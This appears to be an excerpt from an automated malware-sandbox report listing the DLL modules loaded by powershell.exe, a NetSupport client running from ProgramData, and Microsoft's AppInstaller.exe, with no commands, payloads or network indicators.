Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: daxexec.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fltlib.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: container.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: capauthz.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: pcicl32.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: shfolder.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: pcichek.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: pcicapi.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: mpr.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: version.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: winmm.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: wsock32.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: netapi32.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: wininet.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: msvcr100.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: msvcr100.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: netutils.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: samcli.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: dbghelp.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: wtsapi32.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: dbgcore.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: nsmtrace.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: nslsp.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: devobj.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: msasn1.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: pcihooks.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: wbemcomn.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: textshaping.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: winsta.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: amsi.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: userenv.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: profapi.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: riched32.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: riched20.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: usp10.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: msls31.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: wldp.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: pciinv.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: iertutil.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: firewallapi.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: dnsapi.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: fwbase.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: winhttp.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: mswsock.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: winnsi.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: urlmon.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: srvcli.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: profext.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: ntmarta.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: rasadhlp.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: concrt140.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.ui.xaml.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: coremessaging.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: iertutil.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dcomp.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: wintypes.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.storage.applicationdata.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: twinapi.appcore.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: wldp.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: propsys.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: rometadata.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.staterepositorycore.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.ui.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windowmanagementapi.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: textinputframework.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: inputhost.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: coreuicomponents.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: coreuicomponents.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: ntmarta.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: urlmon.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: srvcli.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: netutils.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dxgi.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.applicationmodel.background.systemeventsbroker.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: biwinrt.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: mrmcorer.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.staterepositoryclient.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: d3d11.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dxcore.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: profapi.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: d2d1.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dwrite.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: bcp47mrm.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: textshaping.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: msvcp140_app.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140_1_app.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140_app.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.ui.xaml.controls.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: execmodelproxy.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: rmclient.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: uiamanager.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.ui.core.textinput.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.ui.immersive.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dataexchange.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: winrttracing.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.applicationmodel.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.globalization.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: twinapi.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: directmanipulation.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: daxexec.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: fltlib.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: container.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: userenv.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: profext.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: appcontracts.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: cdprt.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: cdp.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: umpdc.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dsreg.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: msvcp110_win.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: appxpackaging.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: opcservices.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: xmllite.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: msxml6.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: cryptxml.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: webservices.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: msasn1.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: cryptowinrt.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: gpapi.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: certenroll.dll
